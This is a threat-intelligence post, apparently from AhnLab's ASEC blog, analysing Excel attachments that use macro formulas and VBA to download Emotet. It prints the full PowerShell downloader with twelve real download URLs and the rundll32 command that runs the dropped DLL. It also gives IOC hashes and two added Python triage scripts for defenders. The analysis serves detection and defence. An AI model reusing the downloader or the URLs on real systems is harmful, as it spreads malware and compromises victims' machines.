Emotet Being Distributed in Korea via Excel Files

The ASEC analysis team has recently discovered that malicious Excel files which download Emotet are being actively distributed. The team introduced this type of malware in last month's post ‘Emotet Being Distributed Using Excel Files’. At that time, only Excel files that use macro sheets were found, but recently, variants that perform their malicious behavior through VBA macros have also appeared.

The distributed email carried a compressed file as an attachment, which contained a password-protected Excel file.

Figure 1. Distributed email 1

Figure 2. Distributed email 2

Figure 3. Excel file inside the compressed file

The Scan_2456321.xlsx file executes the malicious command through the formula in the cell registered as Auto_Open, just like in the previous case.

Figure 4. Scan_2456321.xlsx file

As shown in Figure 5, a formula exists in the hidden sheet, and when the user clicks Enable Content, it generates a further formula that downloads additional files.

Figure 5. Formula in Scan_2456321.xlsx

The additionally created formula is shown below. When executed, it downloads Emotet from a specific address, saves it as iix.ocx, and executes it.

Figure 6. Additionally created formula

Another Excel file, 4968839233806560.xls, uses a VBA macro, unlike the file above. The image below is embedded in the file to lure users into enabling macros.

Figure 7. Image in 4968839233806560.xls

This Excel file has a password-locked VBAProject with a hidden macro code.

Figure 8. VBAProject locked with a password

Entering the password reveals the following VBA macro. It uses the Workbook_Open() event so that the malicious macro code runs automatically as soon as the user clicks Enable Content.

Figure 9. VBA macro code
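The traits described for both files above (a hidden sheet, an Auto_Open defined name pointing into it, Excel 4.0 macro sheets, and a VBA project) can be checked automatically before a workbook is opened. The Python script below is an added triage example, not code from the original post or from AhnLab. It parses the OOXML zip container (xlsx/xlsm) with the standard library only and builds its own constructed sample workbooks in memory; the sheet name Macro1, the defined-name target Macro1!$A$1 and the macro-sheet body are placeholders for the demo. Legacy BIFF .xls files are not zip containers, so they need a BIFF-aware tool such as oletools' olevba rather than this script.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS = {"m": MAIN_NS}


def triage_workbook(data: bytes) -> dict:
    """Inspect an OOXML workbook (xlsx/xlsm) for hidden sheets, an Auto_Open
    defined name, Excel 4.0 macro sheets and an embedded VBA project."""
    findings = {
        "hidden_sheets": [],      # (sheet name, hidden/veryHidden)
        "auto_open_names": [],    # (defined name, target reference)
        "has_macrosheets": False,
        "has_vba_project": False,
    }
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        # Excel 4.0 macro sheets live under xl/macrosheets/, VBA under xl/vbaProject.bin
        findings["has_macrosheets"] = any(n.startswith("xl/macrosheets/") for n in names)
        findings["has_vba_project"] = "xl/vbaProject.bin" in names
        if "xl/workbook.xml" in names:
            root = ET.fromstring(zf.read("xl/workbook.xml"))
            for sheet in root.iterfind("m:sheets/m:sheet", NS):
                state = sheet.get("state", "visible")
                if state in ("hidden", "veryHidden"):
                    findings["hidden_sheets"].append((sheet.get("name"), state))
            for dn in root.iterfind("m:definedNames/m:definedName", NS):
                name = dn.get("name", "")
                # Excel stores built-in names with the _xlnm. prefix; match both spellings
                if name.lower() in ("_xlnm.auto_open", "auto_open"):
                    findings["auto_open_names"].append((name, (dn.text or "").strip()))
    # Auto_Open on its own is legitimate; combined with a hidden sheet or a
    # macro sheet it matches the pattern the post describes.
    findings["suspicious"] = bool(findings["auto_open_names"]) and (
        bool(findings["hidden_sheets"]) or findings["has_macrosheets"]
    )
    return findings


def build_sample_workbook(with_hidden_macro: bool) -> bytes:
    """Constructed minimal workbook for the demo (not a sample from the campaign):
    one visible sheet, plus optionally a veryHidden macro sheet registered as Auto_Open."""
    sheets = ['<sheet name="Sheet1" sheetId="1" r:id="rId1"/>']
    defined_names = ""
    if with_hidden_macro:
        sheets.append('<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>')
        defined_names = ('<definedNames><definedName name="_xlnm.Auto_Open">'
                         'Macro1!$A$1</definedName></definedNames>')
    workbook_xml = (f'<workbook xmlns="{MAIN_NS}" xmlns:r="{REL_NS}">'
                    f'<sheets>{"".join(sheets)}</sheets>{defined_names}</workbook>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook_xml)
        zf.writestr("xl/worksheets/sheet1.xml",
                    f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>')
        if with_hidden_macro:
            # Placeholder macro-sheet body; a real one carries the cell formulas
            zf.writestr("xl/macrosheets/sheet1.xml",
                        '<xm:macrosheet xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"/>')
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print(triage_workbook(build_sample_workbook(flag)))
```

On a real file, pass the bytes of the workbook to triage_workbook; a `suspicious` result is a reason to detonate the file in a sandbox or open it with macros disabled, not proof of maliciousness on its own.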

When the macro is executed, it creates wetidjks.vbs and jledshf.bat in the ProgramData folder and executes the wetidjks.vbs file.

wetidjks.vbs is obfuscated; when run, it executes jledshf.bat and carries out the command below to run the downloaded Emotet.

  • cmd /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

jledshf.bat contains a base64-encoded PowerShell command. When it is executed, Emotet is downloaded from one of the addresses below and saved to the ProgramData folder as vbkwk.dll; the script tries each URL in turn and stops at the first download of at least 50,000 bytes.

powershell -enc $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");
fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){
	$Js3hlskdcfk="vbkwk";
	$sdewHSw3gkjsd=Get-Random;
	$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";
	iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;
	if(test-pAtH $IDrfghsbzkjxd){
		if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}
	}
}
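The two command lines above (the rundll32 launch and the base64-encoded PowerShell downloader) are what a process-creation log would show, and both can be triaged without running anything. The Python script below is an added example, not code from the original post or from AhnLab. It decodes a -enc payload (base64 over UTF-16LE), lowercases the result so the random casing in the sample no longer matters, looks for the downloader traits visible in jledshf.bat (Invoke-WebRequest, -OutFile, a .dll written under ProgramData), flags case-mangled Verb-Noun cmdlet names such as iNvOke-wEbreQuesT, and separately flags rundll32 loading a DLL from ProgramData. The encoded sample it builds is constructed for the demo with a placeholder URL (http://example.invalid/) and file name (sample.dll); the rundll32 line is the one quoted in the post.

```python
import base64
import re

# Traits of a file-dropping downloader, matched case-insensitively against the
# decoded script (this defeats the random casing used in the sample).
SUSPICIOUS_TOKENS = ("invoke-webrequest", "-outfile", "programdata", ".dll")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -e/-ec/-enc/-EncodedCommand,
    otherwise None."""
    # Copy-pasted logs sometimes turn the hyphen into an en/em dash; normalise first
    normalised = cmdline.replace("\u2013", "-").replace("\u2014", "-")
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", normalised, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_case_mangled(token: str) -> bool:
    """True for Verb-Noun tokens whose halves start lowercase but carry capitals
    later on (iNvOke-wEbreQuesT, test-pAtH); False for normal PascalCase cmdlets."""
    m = re.fullmatch(r"([A-Za-z]+)-([A-Za-z]+)", token)
    if not m:
        return False
    return any(re.match(r"[a-z]+[A-Z]", part) for part in m.groups())


def triage_cmdline(cmdline: str) -> dict:
    """Summarise the indicators found in one process command line."""
    decoded = decode_encoded_command(cmdline)
    body = (decoded or "").lower()
    cmdlets = re.findall(r"\b[A-Za-z]+-[A-Za-z]+\b", decoded or "")
    return {
        "encoded_script": decoded,
        "indicators": [t for t in SUSPICIOUS_TOKENS if t in body],
        "case_mangled_cmdlets": [c for c in cmdlets if is_case_mangled(c)],
        # rundll32 executing a DLL dropped under ProgramData, as in the post's command
        "rundll32_from_programdata": bool(
            re.search(r"rundll32(?:\.exe)?\s+c:\\programdata\\", cmdline, re.IGNORECASE)
        ),
    }


def build_sample_cmdlines() -> list:
    """Constructed command lines for the demo: an encoded downloader with a placeholder
    URL and file name, and the rundll32 line quoted in the post."""
    script = r"iNvOke-wEbreQuesT -uRi http://example.invalid/x -ouTfiLe c:\programdata\sample.dll"
    return [
        "powershell -enc " + encode_powershell(script),
        r"cmd /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd",
    ]


if __name__ == "__main__":
    for line in build_sample_cmdlines():
        print(triage_cmdline(line))
```

Case-mangled cmdlet names are a cheap but telling signal: PowerShell is case-insensitive, so legitimate scripts have no reason to write iNvOke-wEbreQuesT, while a detection rule that only matches the canonical spelling would miss it.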

When the Emotet downloaded through the Excel file is executed, it attempts to access multiple C&C server URLs. If a connection succeeds, it can receive commands from the attacker and perform malicious behaviors such as downloading additional malware.

As Excel files that download Emotet are being actively distributed and various methods are used to download the malware, users need to be cautious. As always stressed, users should refrain from opening email attachments from unknown senders and files from unknown sources. Users should also refrain from enabling macros, so that malicious macros cannot run automatically.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the aliases below.

[File Detection]
Trojan/XLS.PsExec
Trojan/XLS.Agent
Trojan/Win.Emotet

[Behavior Detection]
Execution/MDP.Rundll.M4179

[IOC Info]
8b7a08559eec18b8ccabe70289e67b94
c4f65501d52cbfa5d454d06309545720
c52358a4a8d0b09e98382e5ba4a143a4
c2de652b094b538070e754ee09f3c737

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Emotet Being Distributed in Korea via Excel Files appeared first on ASEC BLOG.
